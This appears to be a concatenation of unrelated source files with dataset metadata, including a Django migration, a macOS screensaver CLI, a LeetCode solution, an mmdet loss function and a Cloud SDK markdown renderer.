'description': ('django.db.models.fields.TextField', [], {}),
'description_en': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_uk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'short_description': ('django.db.models.fields.TextField', [], {}),
'short_description_en': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'short_description_uk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title_en': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title_uk': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
'news.news': {
'Meta': {'ordering': "('position',)", 'object_name': 'News'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'description_en': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_uk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'main_image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'short_description': ('django.db.models.fields.TextField', [], {}),
'short_description_en': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'short_description_uk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title_en': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title_uk': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
'news.newsimage': {
'Meta': {'ordering': "('position',)", 'object_name': 'NewsImage'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '100'}),
'news': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['news.News']"}),
'position': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title_en': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title_uk': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['news'] | [
"vasyl.stanislavchuk@djangostars.com"
] | vasyl.stanislavchuk@djangostars.com |
fff6dfaf784645d56848142b12192e76bdd9d750 | 2696bd485fd09f8b0199f98972163e1140793fd1 | /ems/errorplugin.py | 91c8226da8423505c58c9beebd227ba9a114261d | [
"MIT"
] | permissive | mtils/ems | 24b192faf1d03f78cb9c930193051666a453d18b | a958177d1474828e1d892dda20f4be68869e0483 | refs/heads/master | 2020-05-30T04:37:52.866679 | 2016-10-04T07:30:42 | 2016-10-04T07:30:42 | 30,531,077 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | '''
Created on 28.11.2010
@author: michi
'''
from abc import ABCMeta,abstractmethod
import ems.errorhandler
class ErrorPlugin(object):
    '''
    Abstract base class for error-handling plugins: concrete plugins
    implement notify() and hold a reference to an error handler via the
    ``handler`` property.
    '''
    # NOTE(review): Python-2 style metaclass declaration; under Python 3
    # this attribute has no effect (the class statement would need
    # ``metaclass=ABCMeta``) -- confirm the targeted Python version.
    __metaclass__ = ABCMeta

    @abstractmethod
    def notify(self,caller,eventName,params):
        # Called to report an event (with its parameters) to the plugin.
        pass

    def getHandler(self):
        return self.__handler

    def setHandler(self, value):
        # NOTE(review): ``ems.errorhandler`` is a *module*, so this
        # isinstance() call raises TypeError for any value -- a specific
        # class from that module was probably intended; confirm before
        # relying on setHandler.
        if not isinstance(value, ems.errorhandler):
            raise TypeError("The Errorhandler has to by class or subclass of ems.errorhandler")
        self.__handler = value

    def delHandler(self):
        del self.__handler

    handler = property(getHandler, setHandler, delHandler, "emitter's docstring")
| [
"mtils@web-utils.de"
] | mtils@web-utils.de |
0d47747a40d0c7c0273029effd0c1b8334da506e | c2ee9d6d84e2270ba4c9d6062460a2be0ff5f19c | /674. Longest Continuous Increasing Subsequence.py | 4e450a4b5cac87731b991e0dd25d8a1e2656db08 | [] | no_license | Peiyu-Rang/LeetCode | 0dd915638e8c41c560952d86b4047c85b599d630 | f79886ed3022664c3291e4e78129bd8d855cf929 | refs/heads/master | 2021-11-27T23:48:39.946840 | 2021-11-09T12:47:48 | 2021-11-09T12:47:48 | 157,296,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Sep 23 23:00:52 2021
@author: Caven
"""
class Solution:
    def findLengthOfLCIS(self, nums: List[int]) -> int:
        """Length of the longest strictly increasing contiguous run."""
        best = 0
        run = 0
        previous = None
        for value in nums:
            # Extend the current run only on a strict increase.
            if run and previous < value:
                run += 1
            else:
                run = 1
            previous = value
            if run > best:
                best = run
        return best
"prang3@gatech.edu"
] | prang3@gatech.edu |
17d39886af1a592ec0dccba77fce4f04b761ae65 | a979aeeb72f46a74a2d59ae8be88ee1553fe1419 | /learn_jinja2/p02_loader.py | 091acb5be0ba0fc13e952ecdc0269798dc0e3a91 | [] | no_license | MacHu-GWU/learn_jinja2-project | 6426db19c222fd58f7abf906911bd54afce694d6 | ec343516bf98a8b05a717d6030807237e47e8e48 | refs/heads/master | 2021-01-11T17:55:03.757324 | 2017-02-13T21:29:29 | 2017-02-13T21:29:29 | 79,875,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Loaders are the intermediate classes jinja2 uses to read template source
code from a backing store:

- FileSystemLoader: look up templates by file name under a given directory.
- PackageLoader: look up templates under the ``package_name.package_path``
  directory of an installed Python package.
- DictLoader: read templates from a ``{key: source}`` mapping.
- FunctionLoader: use a function that takes the key as input and returns
  the template source code.
ref: http://jinja.pocoo.org/docs/2.9/api/#loaders
"""
"husanhe@gmail.com"
] | husanhe@gmail.com |
4eed77ded43f3a75192036d14cd1d98c2408c5b9 | df23ee09fffae3ea6a32925f80996f474aefabb9 | /src/myclips/rete/tests/VariableBindingTest.py | 50ad939a4d62e44007c29295d99499e69bb6b296 | [] | no_license | stefano-bragaglia/myclips | 9e5e985d4b67250723012da4b2ed720e2bfeac72 | bb7b8dc6c1446235777c0e4ebf23e641d99ebc03 | refs/heads/master | 2022-08-01T10:09:45.019686 | 2020-05-27T19:59:47 | 2020-05-27T19:59:47 | 267,410,326 | 0 | 0 | null | 2020-05-27T19:38:28 | 2020-05-27T19:38:28 | null | UTF-8 | Python | false | false | 3,435 | py | '''
Created on 24/lug/2012
@author: Francesco Capozzo
'''
from myclips.rete.tests.BetaTest import BetaTest
import myclips
from myclips.rete.tests.locations import VariableReference
from myclips.rete.tests import getTokenAnchestor
class VariableBindingTest(BetaTest):
    '''
    Make sure that variable binding is consistent
    through multiple variable locations
    '''

    def __init__(self, reference):
        '''
        Create a new VariableBindingTest. This test makes sure
        that if a variable is used in multiple locations,
        it has a consistent value across all locations

        @param reference: a location with a reference to a previously binded variable
        @type reference: VariableReference
        '''
        self._reference = reference

    @property
    def reference(self):
        return self._reference

    def isValid(self, token, wme):
        '''
        Compare the value the variable had where it was first bound with
        the value it has at the current wme location.

        @return: False if test fail, True otherwise
        @rtype: Boolean
        '''
        reference = self._reference
        assert isinstance(reference, VariableReference)

        try:
            # if token relative index is 0, then the test is an intra-element
            # test performed in the beta network:
            # the wme where the variable was found first
            # is the same where the variable was found again
            if reference.relPatternIndex != 0:
                nToken = getTokenAnchestor(token, (-1 * reference.relPatternIndex) - 1)
                # get the exact wme value of the token where the variable was used first
                valueInTokenWme = reference.reference.toValue(nToken.wme)
            else:
                valueInTokenWme = reference.reference.toValue(wme)

            # get the value in the current wme where the variable must have the same value
            valueInWme = reference.toValue(wme)

            # compare the two values: equality is required for a positive
            # reference, inequality for a negative one
            eqResult = (valueInTokenWme == valueInWme)
            return eqResult if reference.isNegative is not True else not eqResult

        except KeyError:
            # it's ok. Catching this exception
            # means that the wme has no such index at all,
            # so no value can be tested. This makes the test fail
            return False
        # Bug fix: "except Exception, e:" is Python 2-only syntax; the
        # "as e" form is valid on Python 2.6+ and Python 3.
        except Exception as e:
            # Unexpected exception caught: better log this
            myclips.logger.warning("Unexpected exception caught in %s: token=%s, wme=%s, exception=%s", self, token, wme, repr(e))
            # anyway test failed
            return False

    def __str__(self, *args, **kwargs):
        return str(self._reference)

    def __eq__(self, other):
        return self.__class__ == other.__class__ \
                and self._reference == other._reference

    def __ne__(self, other):
        # Bug fix: Python invokes __ne__ for the != operator; the original
        # method was named __neq__, which the interpreter never calls.
        return not self.__eq__(other)

    # Backward-compatible alias for any code that called __neq__ directly.
    __neq__ = __ne__
"ximarx@gmail.com"
] | ximarx@gmail.com |
73467450fa0036f7742a72b47a6eb21901b226b2 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2634/59018/259642.py | 59bb88db2941ce3defa4ee3eae4a3aeb0e918c70 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | from fractions import Fraction
# Parse a bracketed list such as "[1,2,3]" into ints by stripping the
# enclosing brackets and splitting on commas.
a1=input()[1:-1].split(',')
a=[int(y) for y in a1]
b=[]
# NOTE(review): k is read but never used below; presumably the k-th
# smallest fraction (b[k-1]) was meant to be printed -- verify intent.
k=int(input())
# Build every fraction a[j]/a[i] for j < i, then sort ascending.
# NOTE(review): raises ZeroDivisionError if any element after the first is 0.
for j in range(len(a)-1):
    for i in range(j+1,len(a)):
        b.append(Fraction(a[j],a[i]))
b.sort()
print(b)
"1069583789@qq.com"
] | 1069583789@qq.com |
d5f98c309f1abe4ac6a2df5d704373d1c64f5461 | 08e0fdf4c9b516b96e65b94c2cc9dbda61af6f50 | /screensaver.py | 61830f6042b24fb282196a4463be0bd8895846e4 | [
"CC0-1.0"
] | permissive | von/scripts | 1d1f8e7310ee5f0f48141a199225ef00513216ff | bef4acf5c5e99a74e1759045c13496708f5430d4 | refs/heads/main | 2023-04-06T03:34:19.770846 | 2023-04-01T23:50:25 | 2023-04-01T23:50:59 | 1,017,631 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,987 | py | #!/usr/bin/env python3
"""Manage the OSX screensaver
OSX seems to only accept following values for screensaver idle delay:
60, 120, 300, 600, 1200, 1800, 6000
"""
import argparse
import subprocess
import sys
import time
# Default time to delay screensaver in seconds.
# Note, see --delay, this must be one of set of values accepted by OSC.
DEFAULT_DELAY = 1200
# Default time to suspend in seconds
DEFAULT_SUSPEND_TIME = 3600
def killall_cfprefsd():
    """Restart cfprefsd so that updated defaults actually take effect.

    Kudos: https://superuser.com/a/914884"""
    command = ["killall", "cfprefsd"]
    return subprocess.call(command)
def set_idleTime(seconds):
    """Set the screensaver idle delay to *seconds*.

    0 disables the screensaver.
    Otherwise, OSX seems to only accept following values:
    60, 120, 300, 600, 1200, 1800, 6000
    Anything else defaults to 1200.
    """
    command = [
        "defaults", "-currentHost", "write",
        "com.apple.screensaver", "idleTime", "-int", str(seconds),
    ]
    rc = subprocess.call(command)
    if rc:
        return rc
    # Restart cfprefsd so the new default is picked up.
    return killall_cfprefsd()
def get_idleTime():
    """Return the current screensaver idle delay in seconds."""
    output = subprocess.check_output([
        "defaults", "-currentHost", "read",
        "com.apple.screensaver", "idleTime",
    ])
    return int(output.strip())
def cmd_disable(args):
    """Disable the screensaver (idle delay 0); return subprocess status."""
    args.print_func("Disabling screensaver")
    return set_idleTime(0)
def cmd_enable(args):
    """Enable the screensaver with the delay from args.delay (seconds).

    See set_idleTime() for the delay values OSX accepts."""
    seconds = args.delay
    message = "Enabling screensaver (delay: {}s)".format(seconds)
    args.print_func(message)
    return set_idleTime(seconds)
def cmd_get(args):
    """Print the current screensaver idle delay (seconds); return 0."""
    args.print_func(get_idleTime())
    return 0
def cmd_suspend(args):
    """Disable the screensaver for args.time seconds, then restore the
    previous idle delay.  Returns the last subprocess status."""
    seconds = args.time
    # Remember the current delay so it can be restored afterwards.
    saved_delay = get_idleTime()
    args.print_func(
        "Suspending screensaver for {} seconds".format(seconds))
    rc = set_idleTime(0)
    if rc:
        return rc
    time.sleep(seconds)
    args.print_func(
        "Restoring screensaver ({}s)".format(saved_delay))
    return set_idleTime(saved_delay)
def main(argv=None):
    """Parse command-line arguments and dispatch to the chosen command.

    Args:
        argv: argument vector; defaults to sys.argv.

    Returns:
        The exit status of the selected command, or 2 when no command
        was given (usage is printed in that case).
    """
    # Do argv default this way, as doing it in the functional
    # declaration sets it at compile time.
    if argv is None:
        argv = sys.argv
    # Argument parsing
    parser = argparse.ArgumentParser(
        description=__doc__,  # printed with -h/--help
        # Don't mess with format of description
        formatter_class=argparse.RawDescriptionHelpFormatter,
        # To have --help print defaults with trade-off it changes
        # formatting, use: ArgumentDefaultsHelpFormatter
    )
    parser.set_defaults(
        cmd_func=None,
        print_func=print,
    )
    parser.add_argument("--version", action="version", version="%(prog)s 1.0")

    subparsers = parser.add_subparsers(help="Commands")

    # disable command
    parser_disable = subparsers.add_parser("disable",
                                           help="disable screensaver")
    parser_disable.set_defaults(cmd_func=cmd_disable)

    # enable command
    parser_enable = subparsers.add_parser("enable",
                                          help="enable screensaver")
    parser_enable.set_defaults(
        cmd_func=cmd_enable,
        delay=DEFAULT_DELAY
    )
    parser_enable.add_argument("delay",
                               metavar="seconds",
                               nargs='?',
                               type=int,
                               # OSX seems to only accept these values
                               # anything else defaults to 1200
                               choices=[60, 120, 300, 600,
                                        1200, 1800, 6000])

    # 'get' command: display idle time
    # Bug fix: this sub-parser previously shadowed parser_disable.
    parser_get = subparsers.add_parser("get",
                                       help="get screensave idle time")
    parser_get.set_defaults(cmd_func=cmd_get)

    # suspend command
    parser_suspend = subparsers.add_parser("suspend",
                                           help="suspend screensaver")
    parser_suspend.set_defaults(
        cmd_func=cmd_suspend,
        time=DEFAULT_SUSPEND_TIME,
    )
    parser_suspend.add_argument("time",
                                metavar="seconds",
                                nargs='?',
                                type=int)

    # Bug fix: parse_args() previously ignored the argv parameter and
    # always read sys.argv, defeating the point of accepting argv.
    args = parser.parse_args(argv[1:])

    # Bug fix (was a TODO): with no sub-command, cmd_func stayed None and
    # calling it raised TypeError; print usage and return an error status.
    if args.cmd_func is None:
        parser.print_help()
        return 2
    return args.cmd_func(args)
if __name__ == "__main__":
sys.exit(main())
| [
"von@vwelch.com"
] | von@vwelch.com |
f49abc3e33c7bf8bfd68d36cf057d21a6a3eb7a1 | 07b249d8b26fc49f1268798b3bd6bdcfd0b86447 | /0x11-python-network_1/10-my_github.py | f3d952b775ddf198c746692937a4ff8fe84c66f8 | [] | no_license | leocjj/holbertonschool-higher_level_programming | 544d6c40632fbcf721b1f39d2453ba3d033007d6 | 50cf2308d2c9eeca8b25c01728815d91e0a9b784 | refs/heads/master | 2020-09-28T23:21:13.378060 | 2020-08-30T23:45:11 | 2020-08-30T23:45:11 | 226,889,413 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | #!/usr/bin/python3
"""
script that takes your Github credentials (username and password) and uses
the Github API to display your id
"""
if __name__ == "__main__":
import requests
from sys import argv
r = requests.get('https://api.github.com/user', auth=(argv[1], argv[2]))
print(r.json().get('id'))
| [
"leocj@hotmail.com"
] | leocj@hotmail.com |
270847f71701b79d022b44eb6aa6262c706cf026 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/cv/detection/YoloV3_ID1790_for_PyTorch/mmdet/models/losses/ae_loss.py | 1cedb5ed11153305ccd17816717d025324bbb5ff | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 4,350 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..builder import LOSSES
def ae_loss_per_image(tl_preds, br_preds, match):
    """Associative Embedding Loss in one image.

    Associative Embedding Loss including two parts: pull loss and push loss.
    Pull loss makes embedding vectors from the same object closer to each
    other. Push loss distinguishes embedding vectors of different objects,
    making the gap between them large enough.

    During computing, usually there are 3 cases:
        - no object in image: both pull loss and push loss will be 0.
        - one object in image: push loss will be 0 and pull loss is computed
            by the two corners of the only object.
        - more than one object in image: pull loss is computed by corner pairs
            from each object, push loss is computed by each object with all
            other objects. We use a confusion matrix with 0 in the diagonal to
            compute the push loss.

    Args:
        tl_preds (tensor): Embedding feature map of the top-left corner.
        br_preds (tensor): Embedding feature map of the bottom-right corner.
        match (list): Downsampled coordinate pair of each ground truth box.
    """
    tl_list, br_list, me_list = [], [], []
    if len(match) == 0:  # no object in image
        # Zero tensors derived from the input so device/dtype match the
        # predictions and gradients can still flow.
        pull_loss = tl_preds.sum() * 0.
        push_loss = tl_preds.sum() * 0.
    else:
        for m in match:
            # m holds the (y, x) coordinates of the object's two corners.
            [tl_y, tl_x], [br_y, br_x] = m
            tl_e = tl_preds[:, tl_y, tl_x].view(-1, 1)
            br_e = br_preds[:, br_y, br_x].view(-1, 1)
            tl_list.append(tl_e)
            br_list.append(br_e)
            # Mean embedding of the two corners represents the object.
            me_list.append((tl_e + br_e) / 2.0)

        tl_list = torch.cat(tl_list)
        br_list = torch.cat(br_list)
        me_list = torch.cat(me_list)

        assert tl_list.size() == br_list.size()

        # N is object number in image, M is dimension of embedding vector
        N, M = tl_list.size()

        # Pull loss: squared distance of each corner embedding to the
        # object's mean embedding, averaged over objects.
        pull_loss = (tl_list - me_list).pow(2) + (br_list - me_list).pow(2)
        pull_loss = pull_loss.sum() / N

        margin = 1  # exp setting of CornerNet, details in section 3.3 of paper

        # confusion matrix of push loss
        conf_mat = me_list.expand((N, N, M)).permute(1, 0, 2) - me_list
        # Zero the diagonal so an object is not pushed away from itself.
        conf_weight = 1 - torch.eye(N).type_as(me_list)
        conf_mat = conf_weight * (margin - conf_mat.sum(-1).abs())

        if N > 1:  # more than one object in current image
            push_loss = F.relu(conf_mat).sum() / (N * (N - 1))
        else:
            push_loss = tl_preds.sum() * 0.

    return pull_loss, push_loss
@LOSSES.register_module()
class AssociativeEmbeddingLoss(nn.Module):
    """Associative Embedding Loss.

    More details can be found in
    `Associative Embedding <https://arxiv.org/abs/1611.05424>`_ and
    `CornerNet <https://arxiv.org/abs/1808.01244>`_ .
    Code is modified from `kp_utils.py <https://github.com/princeton-vl/CornerNet/blob/master/models/py_utils/kp_utils.py#L180>`_  # noqa: E501

    Args:
        pull_weight (float): Loss weight for corners from same object.
        push_weight (float): Loss weight for corners from different object.
    """

    def __init__(self, pull_weight=0.25, push_weight=0.25):
        super(AssociativeEmbeddingLoss, self).__init__()
        self.pull_weight = pull_weight
        self.push_weight = push_weight

    def forward(self, pred, target, match):
        """Accumulate the weighted pull/push losses over the batch."""
        num_images = pred.size(0)
        total_pull = 0.0
        total_push = 0.0
        for idx in range(num_images):
            pull, push = ae_loss_per_image(pred[idx], target[idx], match[idx])
            total_pull += self.pull_weight * pull
            total_push += self.push_weight * push
        return total_pull, total_push
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
818560c8ec120e81b3fed0fc5e3cb1e91747f0ba | f05286a2e25950c32c3773f399983b25c87b76b6 | /Setup/SpyderShortcuts.py | fc37c8fb49a51083fab7e60d5ac62258181b1488 | [] | no_license | ajpiter/PythonProTips | cdeaf65771a3f7b21ecd946463e4605a061b9b90 | 5ca6238dfcf248251d6933a313af0ac831ec0117 | refs/heads/master | 2021-07-16T05:30:32.996954 | 2021-04-05T07:44:52 | 2021-04-05T07:44:52 | 92,957,252 | 0 | 1 | null | 2021-01-20T04:21:20 | 2017-05-31T14:53:43 | Python | UTF-8 | Python | false | false | 1,925 | py | #Shortcuts in Spyder
Ctrl-Enter* executes the current cell (menu entry Run ‣ Run cell). A cell is defined as the code between two lines which start with the characters #%%, # %% or # <codecell>.
Shift-Enter* executes the current cell and advances the cursor to the next cell (menu entry Run ‣ Run cell and advance).
Cells are useful for breaking large files or long blocks of code into more manageable chunks. Like those in an IPython notebook, each cell can be run independently.
Alt-Up* moves the current line up. If multiple lines are highlighted, they are moved up together. Alt-Down* works correspondingly, moving line(s) down.
Ctrl-LeftMouseButton or Alt-G* on a function/method in the Editor opens a new Editor tab showing the definition of that function.
Shift-Ctrl-Alt-M* maximizes the current window (or changes the size back to normal if pressed in a maximized window).
Ctrl-Shift-F* activates the Find in Files pane, allowing grep-like searches across all files in a specified scope.
Ctrl - = will increase the font size in the Editor or the Console, whereas Ctrl - - will decrease it.
The font face and size for other parts of the UI can be set under Preferences ‣ General ‣ Appearance ‣ Fonts.
Ctrl-S* in the Editor saves the file currently being edited. This also forces various warning triangles in the left column of the Editor to be updated (otherwise they update every 2.5 seconds by default, which is also configurable).
Ctrl-S* in the Console saves the current IPython session as an HTML file, including any figures that may be displayed inline. This is useful as a quick way of recording what has been done in a session.
(It is not currently possible to load this saved record back into the session -- if you need functionality like this, look for the IPython Notebook).
Ctrl-I* when pressed while the cursor is on an object opens documentation for that object in the help pane.
| [
"noreply@github.com"
] | ajpiter.noreply@github.com |
dd99712e45f55c8a48dd060561422da34ed7e605 | 3433314089e976a121e0a4ff7320d1214faabc8b | /test_autoarray/plot/mapper_rectangular/image_pixel_indexes.py | 0c1ee0a36e3763d8e3a91f0d7aff5ec9206804bc | [
"MIT"
] | permissive | Sketos/PyAutoArray | ab7a63543a35401560ee575c4a8ede7a2561d743 | 72dc7e8d1c38786915f82a7e7284239e5ce87624 | refs/heads/master | 2021-02-12T19:06:17.247806 | 2020-04-10T13:15:00 | 2020-04-10T13:15:00 | 244,619,959 | 0 | 0 | MIT | 2020-03-03T17:21:03 | 2020-03-03T11:35:40 | Python | UTF-8 | Python | false | false | 666 | py | import autoarray as aa
import autoarray.plot as aplt
grid_7x7 = aa.grid.uniform(shape_2d=(7, 7), pixel_scales=0.3)
grid_3x3 = aa.grid.uniform(shape_2d=(3, 3), pixel_scales=1.0)
rectangular_grid = aa.grid_rectangular.overlay_grid(grid=grid_3x3, shape_2d=(3, 3))
rectangular_mapper = aa.mapper(grid=grid_7x7, pixelization_grid=rectangular_grid)
aplt.mapper_obj(mapper=rectangular_mapper, image_pixel_indexes=[0, 1])
aplt.mapper_obj(mapper=rectangular_mapper, image_pixel_indexes=[[0, 1]])
aplt.mapper_obj(mapper=rectangular_mapper, image_pixel_indexes=[[0, 1], [2]])
aplt.mapper_obj(
mapper=rectangular_mapper, image_pixel_indexes=[[(0, 0), (0, 1)], [(1, 2)]]
)
| [
"james.w.nightingale@durham.ac.uk"
] | james.w.nightingale@durham.ac.uk |
cbd326fd284186fd098598ff3f968b2aa2c2310d | 08120ee05b086d11ac46a21473f3b9f573ae169f | /gcloud/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/core/document_renderers/renderer.py | 82b830eae3f231cbb79c97f339a7a7155eff86c8 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | harrystaley/TAMUSA_CSCI4349_Week9_Honeypot | 52f7d5b38af8612b7b0c02b48d0a41d707e0b623 | bd3eb7dfdcddfb267976e3abe4c6c8fe71e1772c | refs/heads/master | 2022-11-25T09:27:23.079258 | 2018-11-19T06:04:07 | 2018-11-19T06:04:07 | 157,814,799 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,398 | py | # -*- coding: utf-8 -*- #
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud SDK markdown document renderer base class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import abc
import io
from googlecloudsdk.core import log
from googlecloudsdk.core.resource import resource_printer
import six
from six.moves import range # pylint: disable=redefined-builtin
# Font Attributes.
BOLD, ITALIC, CODE = list(range(3))
class TableColumnAttributes(object):
"""Markdown table column attributes.
Attributes:
align: Column alignment, one of {'left', 'center', 'right'}.
label: Column heading label string.
width: Minimum column width.
"""
def __init__(self, align='left', label=None, width=0):
self.align = align
self.label = label
self.width = width
class TableAttributes(object):
"""Markdown table attributes.
Attributes:
box: True if table and rows framed by box.
columns: The list of column attributes.
heading: The number of non-empty headings.
"""
def __init__(self, box=False):
self.box = box
self.heading = 0
self.columns = []
def AddColumn(self, align='left', label='', width=0):
"""Adds the next column attributes to the table."""
if label:
self.heading += 1
self.columns.append(
TableColumnAttributes(align=align, label=label, width=width))
def GetPrintFormat(self):
"""Constructs and returns a resource_printer print format."""
fmt = ['table']
attr = []
if self.box:
attr += 'box'
if not self.heading:
attr += 'no-heading'
if attr:
fmt += '[' + ','.join(attr) + ']'
fmt += '('
for index, column in enumerate(self.columns):
if index:
fmt += ','
fmt += '[{}]:label={}:align={}'.format(
index, repr(column.label or '').lstrip('u'), column.align)
if column.width:
fmt += ':width={}'.format(column.width)
fmt += ')'
return ''.join(fmt)
@six.add_metaclass(abc.ABCMeta)
class Renderer(object): # pytype: disable=ignored-abstractmethod
r"""Markdown renderer base class.
The member functions provide an abstract document model that matches markdown
entities to output document renderings.
Attributes:
_blank: True if the output already contains a blank line. Used to avoid
sequences of 2 or more blank lines in the output.
_font: The font attribute bitmask.
_indent: List of left indentations in characters indexed by _level.
_lang: ```lang\n...\n``` code block language. None if not in code block,
'' if in code block with no explicit lang specified.
_level: The section or list level counting from 0.
_out: The output stream.
_title: The document tile.
_width: The output width in characters.
"""
def __init__(self, out=None, title=None, width=80):
self._blank = True
self._font = 0
self._indent = []
self._lang = None
self._level = 0
self._out = out or log.out
self._title = title
self._width = width
def Blank(self):
"""The last output line is blank."""
self._blank = True
def Content(self):
"""Some non-blank line content was added to the output."""
self._blank = False
def HaveBlank(self):
"""Returns True if the last output line is blank."""
return self._blank
def Entities(self, buf):
"""Converts special characters to their entity tags.
This is applied after font embellishments.
Args:
buf: The normal text that may contain special characters.
Returns:
The escaped string.
"""
return buf
def Escape(self, buf):
"""Escapes special characters in normal text.
This is applied before font embellishments.
Args:
buf: The normal text that may contain special characters.
Returns:
The escaped string.
"""
return buf
def Finish(self):
"""Finishes all output document rendering."""
return None
def Font(self, unused_attr, unused_out=None):
"""Returns the font embellishment string for attr.
Args:
unused_attr: None to reset to the default font, otherwise one of BOLD,
ITALIC, or CODE.
unused_out: Writes tags line to this stream if not None.
Returns:
The font embellishment string.
"""
return ''
def SetLang(self, lang):
"""Sets the ```...``` code block language.
Args:
lang: The language name, None if not in a code block, '' is no explicit
language specified.
"""
self._lang = lang
def Line(self):
"""Renders a paragraph separating line."""
pass
def Link(self, target, text):
"""Renders an anchor.
Args:
target: The link target URL.
text: The text to be displayed instead of the link.
Returns:
The rendered link anchor and text.
"""
if text:
if target and '://' in target:
# Show non-local targets.
return '{0} ({1})'.format(text, target)
return text
if target:
return target
return '[]()'
def TableLine(self, line, indent=0):
"""Adds an indented table line to the output.
Args:
line: The line to add. A newline will be added.
indent: The number of characters to indent the table.
"""
self._out.write(indent * ' ' + line + '\n')
def Table(self, table, rows):
"""Renders a table.
Nested tables are not supported.
Args:
table: A TableAttributes object.
rows: A list of rows where each row is a list of column strings.
"""
self.Line()
indent = self._indent[self._level].indent + 2
buf = io.StringIO()
resource_printer.Print(rows, table.GetPrintFormat(), out=buf)
for line in buf.getvalue().split('\n')[:-1]:
self.TableLine(line, indent=indent)
self.Content()
self.Line()
| [
"staleyh@gmail.com"
